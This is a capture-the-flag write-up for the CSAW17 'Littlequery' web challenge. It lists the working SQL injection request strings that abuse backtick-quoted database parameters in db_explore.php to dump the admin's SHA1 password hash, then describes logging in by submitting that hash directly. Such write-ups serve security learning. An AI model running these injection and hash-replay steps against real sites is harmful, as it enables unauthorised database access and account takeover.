Littlequery – Web – CSAW17

Littlequery – Web – CSAW17

Littlequery is a web challenge with a login page :

The behaviour is interesting, when we tried to login, the html password input is replaced by the sha1 of the input with this javascript code :

$(".form-signin").submit(function () {
    var $password = $(this).find("input[type=password]");

So there is a chance that when someone login the sha1 of the password is calculated by the client and compared to the database on the server. We tried different SQL injection on the login form without succes, so we searched an other way to exploit the database, we took a look to the robots.txt :

User-agent: *
Disallow: /api

Mhm /api seems promising so we go to the api folder and found an db_explorer.php :

There are two mode for the db_explorer.php schema and preview. By using schema we were able to get the architecutre of the database :

db_explore.php?mode=schema : {"dbs":["littlequery"]}
db_explore.php?mode=schema&db=littlequery : {"tables":["user"]}
db_explore.php?mode=schema&db=littlequery&table=user : {"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}

So we try db_explore.php?mode=preview&db=littlequery&table=user to see all users but got a nice Database ‘littlequery’ is not allowed to be previewed.. So we start playing with parameters to understand how db_explorer.php was working. Here the different try of SQL injection

db_explore.php?mode=preview&db=littlequery.user&table=user : `littlequery.user`.`user` doesn't exist.
db_explore.php?mode=preview&db=littlequery`.`user&table=user : `littlequery`.`user`.`user` doesn't exist.
db_explore.php?mode=preview&db=littlequery`.`user`; -- &table=user : [{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]

And we got the sha1 of admin’s password, so by disabling javascript we could login by putting the hash in password field and get the flag : flag{mayb3_1ts_t1m3_4_real_real_escape_string?}